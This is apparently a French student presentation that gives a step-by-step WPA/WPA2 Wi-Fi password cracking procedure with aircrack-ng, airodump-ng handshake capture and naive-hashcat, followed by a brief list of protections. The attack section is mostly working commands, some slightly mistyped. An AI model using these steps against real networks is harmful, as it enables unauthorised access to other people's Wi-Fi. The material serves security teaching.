# Piratage du mot de passe du Wifi Présenté par Alexandre BENALI, Yoan MENDES SEMEDO, Amine ABBES, Lory Stan TANASI-CHAMSOUDINE de la classe E4 DAD A ## Piratage du mot de passe On démarre par l'installation du logiciel qui permettra de pirater le mot de passe du Wifi ``` sudo apt install aircrack-ng ``` ![](https://i.imgur.com/DwCLuFc.png) On liste ensuite les cartes réseau disponibles ``` sudo airmon-ng ``` ![](https://i.imgur.com/oT3SruR.png) L'interface réseau de la machine se nomme wlps0 On passe l'interface wlps0 en mode moniteur ``` sudo airmon-ng start wlps0 ``` ![](https://i.imgur.com/ec01mPb.png) On active l'interface du mode moniteur et on stoppe les proccesus qui peuvent gêner les opérations ```` sudo iwconfig sudo airmon-ng check kill ```` ![](https://i.imgur.com/FNmKUkr.png) On lance l'écoute des routeurs à portée de la carte réseau ```` sudo airodump wlps0 ```` ![](https://i.imgur.com/oEnALkc.png) L'opération fonctionne sur les réseaux protégés par WPA ou WPA2 uniquement On récupère l'adresse MAC du routeur ainsi que le canal ![](https://i.imgur.com/H9bbLgf.png) Puis on établit une liaison avec le routeur avec la commande suivante à l'aide des informations récoltées précédement ```` airodump-ng -c 1 --bssid A4:3E:51:4E:9C:4F -w /home/alexandre/Bureau/ wlps0 ```` ![](https://i.imgur.com/L8iOvVB.png) Le programme va ensuite chercher une liaison lorsque que quelqu'un se connecte Le programme nous fourni un fichier .cap (ici -01.cap) qu'il faudra convertir en .hccapx On pourra extraire le mot de passe Wifi de ce ficher à l'aide du programme naive-hashcat ```` HASH_FILE=-01.hccapx POT_FILE=-01.pot HASH_TYPE=2500./naive-hashcat.sh ```` ## Se protéger de l'attaque Il existe plusieurs solutions pour se protéger de l'attaque : * Changer le mot de passe Wifi régulièrement * Passer l'encryption du mot de passe en WPA3 si possible * Filtrer les adresses MAC des appareils capables de se connecter * Cacher le SSID aux appareils inconnus La majorité de ces opérations sont disponibles via l'interface Web du routeur.